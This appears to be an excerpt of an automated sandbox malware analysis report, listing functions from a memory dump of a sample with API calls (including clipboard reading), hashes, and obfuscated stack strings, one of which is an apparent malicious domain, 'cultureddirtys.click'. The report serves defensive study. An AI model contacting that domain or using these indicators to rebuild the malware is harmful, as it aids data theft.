Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: d0749cdc5df812cb6ac7c8d757f54b4bf86516530be8d0671feb7a3c957f9d73
Instruction ID: 6baabc2f400d74bc3cc3e52e4864705022086fc3a6dac1c42d8c82fd81c1826e
Opcode Fuzzy Hash: d0749cdc5df812cb6ac7c8d757f54b4bf86516530be8d0671feb7a3c957f9d73
Instruction Fuzzy Hash: AC11C4B42002428FE7218F39E860766BBE1EF5B310F5885AED4D6CB392D6359855CB54

Function 0043845E Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043849D

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 8e4b8c7decdfa350a8bc859784f24849c84484a77cca8042150f9ef646be80da
Instruction ID: e4a2fe5edf5eaf821eb43d3253ba587dcf30a68b9fae9967b9745e6c75c08cbc
Opcode Fuzzy Hash: 8e4b8c7decdfa350a8bc859784f24849c84484a77cca8042150f9ef646be80da
Instruction Fuzzy Hash: 0111D330A042998FEB55CF38C9943EE7BB19F5A304F1441ADD98997381DA354A45DB41

Function 0043EEB0 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B5E1,00000000,00000001), ref: 0043EEE2

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c1cfb25f9ca5057cbbecb85cc201234f314c3f5d7be1ff921169e6ec6f554acf
Instruction ID: ba33a129d28c7172b56fe05f0f90b6f119921568aecab9275dd0d0c39a0e8d50
Opcode Fuzzy Hash: c1cfb25f9ca5057cbbecb85cc201234f314c3f5d7be1ff921169e6ec6f554acf
Instruction Fuzzy Hash: 70F0E27A809150FBC7102F25BC02A2B36A8EF9F319F06043AF40156252E739E812969F

Function 0040CA30 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA43

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 642477734c0a30261e0d3fef009ee2af9e9027b6d50c1c3110e2fccbcf79d17d
Instruction ID: ffb6ed576fe853ee5a21e9a51bde7b0bbbbce661129cace3c9cde7aa92b908c6
Opcode Fuzzy Hash: 642477734c0a30261e0d3fef009ee2af9e9027b6d50c1c3110e2fccbcf79d17d
Instruction Fuzzy Hash: 9CE0F13772140007E70C5B68EC2BB543217C7C2304F0CD23C81664B5C9CD383808C2C5

Function 004338E1 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00433926

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 68a86c12092803995df73badf31053cff6c51b40ce8c9bf961eec9eb0bd2ed80
Instruction ID: 761de1e76abfc9ea90946d1ed4181edd1fa90c59b6ac2b60fe9c48daef89d1e7
Opcode Fuzzy Hash: 68a86c12092803995df73badf31053cff6c51b40ce8c9bf961eec9eb0bd2ed80
Instruction Fuzzy Hash: 86F0F8B4609302CFD304DF68D4A871BBBE0EF85308F11891CE4A98B390CBB59548CF86

Function 00432F78 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432FC2

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1f11d6b5724a2fcd60a3fb59276043c54f0088b610810748f5cd56331374f6ec
Instruction ID: a7951836f69d18ea9e2f5a6f4f7ac9b492bcf35ef2dd77ae782caa37a78da9e9
Opcode Fuzzy Hash: 1f11d6b5724a2fcd60a3fb59276043c54f0088b610810748f5cd56331374f6ec
Instruction Fuzzy Hash: DBF0D4B41087028FE310CF25C09934BBBE1AB81308F15891CE4A54B390D7BAE989CFC6

Function 0043D420 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043EF01,?,0040B5E1,00000000,00000001), ref: 0043D43E

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4daef5b6ed35b562b1c990082d6d47a5a171f673cd63196ded17d62ff1805de2
Instruction ID: a25689e2d052caa935b9170849c61ee6e5dc1551c885265e18347b9850a6da0a
Opcode Fuzzy Hash: 4daef5b6ed35b562b1c990082d6d47a5a171f673cd63196ded17d62ff1805de2
Instruction Fuzzy Hash: DDD01231555132EBC7101F15FC16B873A54DF0A321F070462B5446F0B1C674DC519BD8

Function 0043D400 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,0040883A,?,0040883A), ref: 0043D410

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 64be15dc9b9fa60ff4367870892133a1fd189e42d25cdd893f295977a3f3d5e7
Instruction ID: 7abb61d210cd40f2ebc837c9ca936a111d1e3569400e52468b140bea4252c194
Opcode Fuzzy Hash: 64be15dc9b9fa60ff4367870892133a1fd189e42d25cdd893f295977a3f3d5e7
Instruction Fuzzy Hash: ECC09B31555121ABDA106F15FC05FC67F54EF45351F024056F50467077C770EC51D6D8

Non-executed Functions

Function 004121C0 Relevance: 145.5, APIs: 2, Strings: 80, Instructions: 1977COMMON

Download Yara Rule

Strings

5, xrefs: 004137B4
%, xrefs: 00413834
L, xrefs: 00413AB4
#, xrefs: 004134EC
M, xrefs: 004133A9
`, xrefs: 00413241
), xrefs: 0041350C
b, xrefs: 00413554
d, xrefs: 00413544
&, xrefs: 0041334D
', xrefs: 00413182
/, xrefs: 0041351C
+, xrefs: 004134CC
;, xrefs: 00413764
/, xrefs: 00413804
Z, xrefs: 00412542
9, xrefs: 00413754
e, xrefs: 00413C04
D, xrefs: 00413F21
#, xrefs: 00413824
3, xrefs: 004134FC
., xrefs: 004134DC
., xrefs: 00412286
f, xrefs: 0041352C
A, xrefs: 00413AC4
r, xrefs: 00413B44
=, xrefs: 004136E0
-, xrefs: 00413C3C
., xrefs: 004131A0
|, xrefs: 00413BC4
?, xrefs: 004136EA
+, xrefs: 004137E4
Y, xrefs: 00413BD4
G, xrefs: 00413744
D, xrefs: 00413CE8
1, xrefs: 00413794
7, xrefs: 004137C4
B, xrefs: 00413357
p, xrefs: 00413B14
u, xrefs: 00413BF4
3, xrefs: 004137A4
=, xrefs: 00413774
?, xrefs: 00413784
y, xrefs: 00413BA4
G, xrefs: 00413AD4
a, xrefs: 00413B74
,, xrefs: 00413C34
E, xrefs: 00413734
N, xrefs: 00413B84
f, xrefs: 00413534
o, xrefs: 00412329
J, xrefs: 00413C24
!, xrefs: 00413814
e, xrefs: 0041354C
c, xrefs: 0041318C
D, xrefs: 00412FBB
o, xrefs: 00413B24
M, xrefs: 00412CAC
', xrefs: 00413844
., xrefs: 0041339F
-, xrefs: 004137F4
I, xrefs: 0041222D
p, xrefs: 00413B34
>, xrefs: 004136E5
E, xrefs: 00413B04
^, xrefs: 004136DB
n, xrefs: 00413196
0, xrefs: 0041253D
F, xrefs: 00413AF4
,, xrefs: 00412429
}, xrefs: 00413B94
), xrefs: 00413C1C
b, xrefs: 00413BE4
+, xrefs: 00413C2C
b, xrefs: 00412727
W, xrefs: 00413AE4
k, xrefs: 004124AF
/, xrefs: 00413352
:, xrefs: 004133A4
), xrefs: 004137D4

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: !$#$#$%$&$'$'$)$)$)$+$+$+$,$,$-$-$.$.$.$.$/$/$/$0$1$3$3$5$7$9$:$;$=$=$>$?$?$A$B$D$D$D$E$E$F$G$G$I$J$L$M$M$N$W$Y$Z$^$`$a$b$b$b$c$d$e$e$f$f$k$n$o$o$p$p$r$u$y$|$}
API String ID: 0-499542340
Opcode ID: ec99b2b2795cbb4344a55b48e8f125dad34b2f24709b2feb5da6528b336e76f3
Instruction ID: 37916e465bb23c59d57fdc821f24f4913477d981b86dd659dfd91eb10b080a64
Opcode Fuzzy Hash: ec99b2b2795cbb4344a55b48e8f125dad34b2f24709b2feb5da6528b336e76f3
Instruction Fuzzy Hash: 0403E03150C7C18AC3349F38884539FBFD1AB96324F188B6EE5E9873D2D6B885868757

Function 004237D9 Relevance: 115.4, Strings: 92, Instructions: 382COMMON

Download Yara Rule

Strings

|, xrefs: 00423BDE
4, xrefs: 00423D2E
s, xrefs: 00423A6F
l, xrefs: 00423839
C, xrefs: 004238F2
H, xrefs: 004238FE
n, xrefs: 00423C5C
~, xrefs: 00423E52
Y, xrefs: 004238C6
B, xrefs: 00423801
\, xrefs: 004238B6
V, xrefs: 00423DDD
V, xrefs: 00423CA2
B, xrefs: 00423D74
y, xrefs: 00423B60
S, xrefs: 00423886
T, xrefs: 00423DEB
H, xrefs: 004239FF
s, xrefs: 004238E6
P, xrefs: 004238CA
l, xrefs: 00423CF6
f, xrefs: 00423A07
Q, xrefs: 004238AA
M, xrefs: 00423E5A
O, xrefs: 004239F7
Z, xrefs: 00423D89
X, xrefs: 004238CE
U, xrefs: 00423DF2
3, xrefs: 00423CB0
K, xrefs: 00423A8F
5, xrefs: 00423D58
B, xrefs: 00423E62
;, xrefs: 00423942
2D69C26FE306D42DBC3F28D12F61E48B, xrefs: 00423B00
D, xrefs: 0042390E
=, xrefs: 00423D66
N, xrefs: 00423A03
c, xrefs: 00423816
&, xrefs: 00423D12
u, xrefs: 004237FA
i, xrefs: 0042385C
8, xrefs: 00423CE8
w, xrefs: 00423B98
m, xrefs: 00423863
x, xrefs: 00423A7F
=, xrefs: 00423D20
_, xrefs: 004239FB
r, xrefs: 00423D3C
P, xrefs: 00423DCF
J, xrefs: 00423DF9
C, xrefs: 004238EE
Q, xrefs: 00423BEC
v, xrefs: 00423922
_, xrefs: 004238C2
4, xrefs: 00423CCC
6, xrefs: 00423CDA
n, xrefs: 00423C4E
h, xrefs: 0042382B
T, xrefs: 0042389B
X, xrefs: 00423D97
l, xrefs: 00423DD6
-, xrefs: 00423D04
\, xrefs: 00423DB3
K, xrefs: 00423906
|, xrefs: 004238E2
1, xrefs: 004237E5
u, xrefs: 004237EC
<, xrefs: 00423BA6
i, xrefs: 00423DE4
f, xrefs: 0042384E
^, xrefs: 00423DA5
r, xrefs: 00423C08
[, xrefs: 00423894
R, xrefs: 00423DC1
8, xrefs: 00423D4A
d, xrefs: 00423CBE
}, xrefs: 00423B6E
\, xrefs: 0042394A
0, xrefs: 00423B44
f, xrefs: 00423B52
l, xrefs: 00423BC2
y, xrefs: 00423840
J, xrefs: 004238D6
{, xrefs: 0042391A
%, xrefs: 00423847
_, xrefs: 004238B2
c, xrefs: 00423808
cultureddirtys.click, xrefs: 00423ED2
,, xrefs: 00423878
k, xrefs: 0042386A
;, xrefs: 00423946
7, xrefs: 00423D82

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: %$&$,$-$0$1$2D69C26FE306D42DBC3F28D12F61E48B$3$4$4$5$6$7$8$8$;$;$<$=$=$B$B$B$C$C$D$H$H$J$J$K$K$M$N$O$P$P$Q$Q$R$S$T$T$U$V$V$X$X$Y$Z$[$\$\$\$^$_$_$_$c$c$cultureddirtys.click$d$f$f$f$h$i$i$k$l$l$l$l$m$n$n$r$r$s$s$u$u$v$w$x$y$y${$|$|$}$~
API String ID: 0-3687749958
Opcode ID: dc29f9c1eedaba7f815aa351f6f603309ef6c3e347e92a45d930aef5149db11d
Instruction ID: 2d507b8b3a00dfe39267ba81057b2953a598beefa9d101ab2f8ee89295f11557
Opcode Fuzzy Hash: dc29f9c1eedaba7f815aa351f6f603309ef6c3e347e92a45d930aef5149db11d
Instruction Fuzzy Hash: D6220E1190C7EAC9DB32C67C8C0979DBEA11B23224F4847DDD0E86B2D3D6790A85CB66

Function 0041D490 Relevance: 64.9, Strings: 51, Instructions: 1135COMMON

Download Yara Rule

Strings

e, xrefs: 0041DFED
z, xrefs: 0041D864
S, xrefs: 0041DC1B
a, xrefs: 0041E001
w, xrefs: 0041DFD4
g, xrefs: 0041DFE3
!, xrefs: 0041D9AD
/, xrefs: 0041D9C5
m, xrefs: 0041D739
", xrefs: 0041D9B5
&, xrefs: 0041D6E5
-, xrefs: 0041D9DD
=, xrefs: 0041D90E
x, xrefs: 0041DFD9
%, xrefs: 0041D9BD
-, xrefs: 0041D748
U, xrefs: 0041D869
6, xrefs: 0041D6E0
;, xrefs: 0041D708
", xrefs: 0041E376
;, xrefs: 0041D975
U, xrefs: 0041DFF2
v, xrefs: 0041DFCF
|, xrefs: 0041D8DC
5, xrefs: 0041D98D
P, xrefs: 0041DC20
F, xrefs: 0041D8A5
,, xrefs: 0041E40E
H, xrefs: 0041D8E1
", xrefs: 0041E37B
e, xrefs: 0041DFE8
U, xrefs: 0041DC11
-, xrefs: 0041DAD5
), xrefs: 0041D9FD
^, xrefs: 0041DC16
', xrefs: 0041DA85
2, xrefs: 0041D9ED
c, xrefs: 0041DFFC
X, xrefs: 0041DA65
\, xrefs: 0041DA5D
", xrefs: 0041D83C
, xrefs: 0041D4C7
Q, xrefs: 0041D8D7
=, xrefs: 0041E380
n, xrefs: 0041D73E
4, xrefs: 0041D9D5
`, xrefs: 0041D743
h, xrefs: 0041D841
:, xrefs: 0041D93D
c, xrefs: 0041DFF7
", xrefs: 0041D837

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: $!$"$"$"$"$"$%$&$'$)$,$-$-$-$/$2$4$5$6$:$;$;$=$=$F$H$P$Q$S$U$U$U$X$\$^$`$a$c$c$e$e$g$h$m$n$v$w$x$z$|
API String ID: 0-3626050199
Opcode ID: 65c6563e2eabac05e39d757a47caa7d14d77d1258a093da204e2dab90ae6810d
Instruction ID: 52197e9dfb1b3d4bd5ebed04cdc8e402f22a0ee503ec71cf898a23ea6b3ce322
Opcode Fuzzy Hash: 65c6563e2eabac05e39d757a47caa7d14d77d1258a093da204e2dab90ae6810d
Instruction Fuzzy Hash: 04A2BF7160C7D18BC335CA3C885439EBBD1AB96324F184B6EE8E98B3D2D6788845C757

Function 004388B6 Relevance: 61.7, Strings: 49, Instructions: 401COMMON

Download Yara Rule

Strings

d, xrefs: 004388C9
P, xrefs: 0043891D
4, xrefs: 00438E41
1, xrefs: 00438B00
@, xrefs: 00438C50
e, xrefs: 00438B8C
L, xrefs: 00438971
=, xrefs: 00438A2E
g, xrefs: 00438BB6
/, xrefs: 00438E5F
., xrefs: 00438E5B
B, xrefs: 0043897F
#, xrefs: 00438986
<, xrefs: 00438A12
;, xrefs: 00438AC8
J, xrefs: 00438947
), xrefs: 0043895C
i, xrefs: 00438BC4
@, xrefs: 00438C34
, xrefs: 004389E8
-, xrefs: 00438A04
z, xrefs: 00438C18
,, xrefs: 00438A90
#, xrefs: 004388C2
T, xrefs: 00438939
\, xrefs: 00438901
$, xrefs: 00438B70
n, xrefs: 00438BD2
R, xrefs: 0043890F
F, xrefs: 0043899B
X, xrefs: 004388E5
D, xrefs: 004389A9
^, xrefs: 004388F3
;, xrefs: 004388DE
Z, xrefs: 00438B9A
3, xrefs: 00438916
Z, xrefs: 004388D7
], xrefs: 00438B7E
N, xrefs: 00438963
J, xrefs: 00438C0A
|, xrefs: 00438C42
1, xrefs: 00438A82
@, xrefs: 0043898D
V, xrefs: 0043892B
H, xrefs: 00438955
', xrefs: 00438B46
t, xrefs: 00438C26
b, xrefs: 00438BE0
t, xrefs: 00438BFC

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: $#$#$$$'$)$,$-$.$/$1$1$3$4$;$;$<$=$@$@$@$B$D$F$H$J$J$L$N$P$R$T$V$X$Z$Z$\$]$^$b$d$e$g$i$n$t$t$z$|
API String ID: 0-3928828129
Opcode ID: 4ad8651241e16dbfcf0c9acec7b1b64277546e3bf793181a312d5869433c5eb9
Instruction ID: e30a54acdedb43f8eee129d518dd75d18b07f07d9a3902bb8d47857e251e627b
Opcode Fuzzy Hash: 4ad8651241e16dbfcf0c9acec7b1b64277546e3bf793181a312d5869433c5eb9
Instruction Fuzzy Hash: 32223E209087E989DB32C63C8C487CDBEB15B67324F0843D9D1E96B2D2D7750A86CB66

Function 0043943D Relevance: 47.8, Strings: 38, Instructions: 309COMMON

Download Yara Rule

Strings

M, xrefs: 0043974C
6, xrefs: 004394FB
^, xrefs: 004394D7
G, xrefs: 004394B7
^, xrefs: 004394BF
., xrefs: 0043955B
S, xrefs: 00439754
&, xrefs: 0043953B
0, xrefs: 00439736
, xrefs: 00439553
O, xrefs: 004394A7
_, xrefs: 004394E7
C, xrefs: 00439457
j, xrefs: 004394CF
2, xrefs: 0043950B
B, xrefs: 0043954F
H, xrefs: 00439473
X, xrefs: 004394EF
8, xrefs: 00439533
@, xrefs: 00439465
0, xrefs: 00439513
:, xrefs: 0043952B
Q, xrefs: 00439449
B, xrefs: 00439497
>, xrefs: 0043951B
<, xrefs: 004395EA
U, xrefs: 004394F7
!, xrefs: 00439557
$, xrefs: 00439543
B, xrefs: 0043949F
R, xrefs: 00439750
G, xrefs: 004394AF
4, xrefs: 00439503
", xrefs: 0043954B
|, xrefs: 0043948F
>, xrefs: 004395F3
<, xrefs: 00439523
W, xrefs: 004394FF

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: $!$"$$$&$.$0$0$2$4$6$8$:$<$<$>$>$@$B$B$B$C$G$G$H$M$O$Q$R$S$U$W$X$^$^$_$j$|
API String ID: 0-2149627891
Opcode ID: 730ad8987f53418f14648a5a6b25224b983cd8224231e815b5e9ab825efb5515
Instruction ID: 16e4426fae9874c56575744c78141763847b3d8a3ccfb18cc28ce99ffc56b2da
Opcode Fuzzy Hash: 730ad8987f53418f14648a5a6b25224b983cd8224231e815b5e9ab825efb5515
Instruction Fuzzy Hash: 3EE1CF31D087E98ADB26C67C88043DDBFB15B56324F0843D9D4A8AB3C2C7B94A46CB56

Function 00439F50 Relevance: 17.7, Strings: 14, Instructions: 245COMMON

Download Yara Rule

Strings

o, xrefs: 0043A0EA
A, xrefs: 00439FE0
e, xrefs: 0043A1C7
C, xrefs: 0043A0EF
@, xrefs: 00439F64
@, xrefs: 00439FDB
A, xrefs: 00439F69
k, xrefs: 0043A13E
Q, xrefs: 0043A1C2
C, xrefs: 00439F5F
u, xrefs: 0043A0F4
C, xrefs: 00439FD6
g, xrefs: 0043A1CC
i, xrefs: 0043A0F9

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: @$@$A$A$C$C$C$Q$e$g$i$k$o$u
API String ID: 0-40470204
Opcode ID: 06cd44d294c13ce9531f78a20d59c4b2a525e99f8e05c5b885ded6178d5df9a1
Instruction ID: c10ac864b138def3bf95dbedbc0d4832f234108f875dc2a5cfef2a4e6f2bd5ef
Opcode Fuzzy Hash: 06cd44d294c13ce9531f78a20d59c4b2a525e99f8e05c5b885ded6178d5df9a1
Instruction Fuzzy Hash: 2491E62254C7D14AD3158A3C884435BEFD21BE7224F1DCAAED4F5973C2D5AEC90A83A7

Function 00427230 Relevance: 13.1, Strings: 10, Instructions: 567COMMON

Download Yara Rule

Strings

5QRS, xrefs: 0042773E
+r>p, xrefs: 004273AC
z`gf, xrefs: 0042733C
2xB, xrefs: 00427820
2v6t, xrefs: 004273A5
=]#_, xrefs: 00427737
>n<l, xrefs: 00427397
8E'G, xrefs: 00427729
3A2C, xrefs: 00427722
'j7h, xrefs: 0042739E

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: 'j7h$+r>p$2v6t$2xB$3A2C$5QRS$8E'G$=]#_$>n<l$z`gf
API String ID: 0-2000455238
Opcode ID: 50898734459a215359d9898fb5530acfe52cd2530e2e3a2e2c25f9c137dd0af4
Instruction ID: 8e50c2f0ea1f6845ec0090da7dd08f27c4872ff8a3a3d82bada98734c817426a
Opcode Fuzzy Hash: 50898734459a215359d9898fb5530acfe52cd2530e2e3a2e2c25f9c137dd0af4
Instruction Fuzzy Hash: BD0202B5E04204DFDB18CFA9DC92BAEBBB1FB45304F15806DE541AB3A1D734A812CB94

Function 0041655E Relevance: 11.7, APIs: 4, Strings: 2, Instructions: 1157COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00416CA2

Strings

^\, xrefs: 00416FC2
/sA, xrefs: 00417328

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: /sA$^\
API String ID: 237503144-113726921
Opcode ID: 2da563f0e2060f7682f4ef93ff72d2c3ba901c6788d8915bd3d019031bcfb6c5
Instruction ID: 47852da8b4363b37997c9a3fdba9efedb8659700efe5e90bde95f7721ad1d789
Opcode Fuzzy Hash: 2da563f0e2060f7682f4ef93ff72d2c3ba901c6788d8915bd3d019031bcfb6c5
Instruction Fuzzy Hash: 0982ED75200701CFD724CF29C8917A2B7F2FF9A310B1A896DD9968B7A5D739E842CB44

Function 0041B560 Relevance: 9.4, Strings: 7, Instructions: 651COMMON

Download Yara Rule

Strings

)R P, xrefs: 0041B9BC
/^>\, xrefs: 0041B9C3
q, xrefs: 0041B7E5
2N L, xrefs: 0041B9A7
6Z6X, xrefs: 0041B9CA
,J?H, xrefs: 0041B9AE
q, xrefs: 0041B6CA

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: )R P$,J?H$/^>\$2N L$6Z6X$q$q
API String ID: 0-1392680054
Opcode ID: 54f63a03ad6fbe38765255c4880f35ca4f8c1d031e0356416910e5c3cd2b2214
Instruction ID: 06939293d696cf48edc9c866a293eca4d1e9f433faf44d9e4e0afd8f21a3e00b
Opcode Fuzzy Hash: 54f63a03ad6fbe38765255c4880f35ca4f8c1d031e0356416910e5c3cd2b2214
Instruction Fuzzy Hash: 541234B2900215CFCB14CF69C8915EBBBB1FF4A320B19856DD856AB352D338A942CBD5

Function 00436020 Relevance: 9.1, APIs: 6, Instructions: 124clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436042
GetClipboardData.USER32 ref: 00436063
GlobalLock.KERNEL32 ref: 00436080
CloseClipboard.USER32 ref: 0043619B

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: c7b56344ecfe322a79ade127bdafa7707e097675e5f64e58ede00c47f4c82a42
Instruction ID: 4baeb6e306746a3e272314401915990cb5fee85de7cf105a9658a6ff921a20f4
Opcode Fuzzy Hash: c7b56344ecfe322a79ade127bdafa7707e097675e5f64e58ede00c47f4c82a42
Instruction Fuzzy Hash: 9A41D3B0908782AEDB01AF78D58935EBFF0AB06304F06853ED49987242D77D9459CBD7

Function 004247C0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004248BA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042493C

Strings

GD, xrefs: 00424802
2JB, xrefs: 00424A27
_q, xrefs: 004247F2

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2JB$GD$_q
API String ID: 237503144-1507879037
Opcode ID: da33318a7a743e3c09c490f052999c537aac1edadb12bb3997c655bd85d8ee67
Instruction ID: 645d6858e5cc2ff3ca1e1f2afa1359317a52b722a995141bc4bf64d2712732ee
Opcode Fuzzy Hash: da33318a7a743e3c09c490f052999c537aac1edadb12bb3997c655bd85d8ee67
Instruction Fuzzy Hash: 427102B564C3509FD310CF24E88076FBBE0EBC6705F05493DF9999B281D7B9980A8B96

Function 004091E0 Relevance: 7.9, Strings: 6, Instructions: 379COMMON

Download Yara Rule

Strings

rrp|, xrefs: 004094D5
BA, xrefs: 0040935B
r, xrefs: 004094EE
eMOF, xrefs: 0040942E
c, xrefs: 004094C5
=, xrefs: 00409362

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: =$BA$c$eMOF$r$rrp|
API String ID: 0-292436732
Opcode ID: 216e9b0c30a2e8b6d4ecf1aaa30ecb9b097f87b278e46452b0acd07dd4603ad5
Instruction ID: 593da3a24b24698acd308230021430daba89a9387af62b725af4abf13776ee22
Opcode Fuzzy Hash: 216e9b0c30a2e8b6d4ecf1aaa30ecb9b097f87b278e46452b0acd07dd4603ad5
Instruction Fuzzy Hash: 10B1E47154C3918AC312CF7A885076BFFE1AFD7644F0849ADE4D09B3C2D6798906C796

Function 004201B0 Relevance: 6.8, Strings: 5, Instructions: 504COMMON

Download Yara Rule

Strings

(w/q, xrefs: 0042027D
b`af, xrefs: 0042067A
mo, xrefs: 00420350
~m, xrefs: 00420340
s%}, xrefs: 00420285

Memory Dump Source

Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd

Similarity

API ID:
String ID: s%}$(w/q$b`af$mo$~m
API String ID: 0-3902129397
Opcode ID: 3e8571fb155354bbedcace902f23ebdd9fbb183982d035b371f64f7ff6dca5cf
Instruction ID: 75df917b3e65b6834e2e45e2b851160fa374b79e490a59220d6594e49e11abcc
Opcode Fuzzy Hash: 3e8571fb155354bbedcace902f23ebdd9fbb183982d035b371f64f7ff6dca5cf
Instruction Fuzzy Hash: 00D12571A083218BD724CF24D85136BB7F1EFD1324F188A2DE8D59B391E7799801CB86

Function 0040CB08 Relevance: 6.5, Strings: 5, Instructions: 286COMMON

Download Yara Rule

Strings
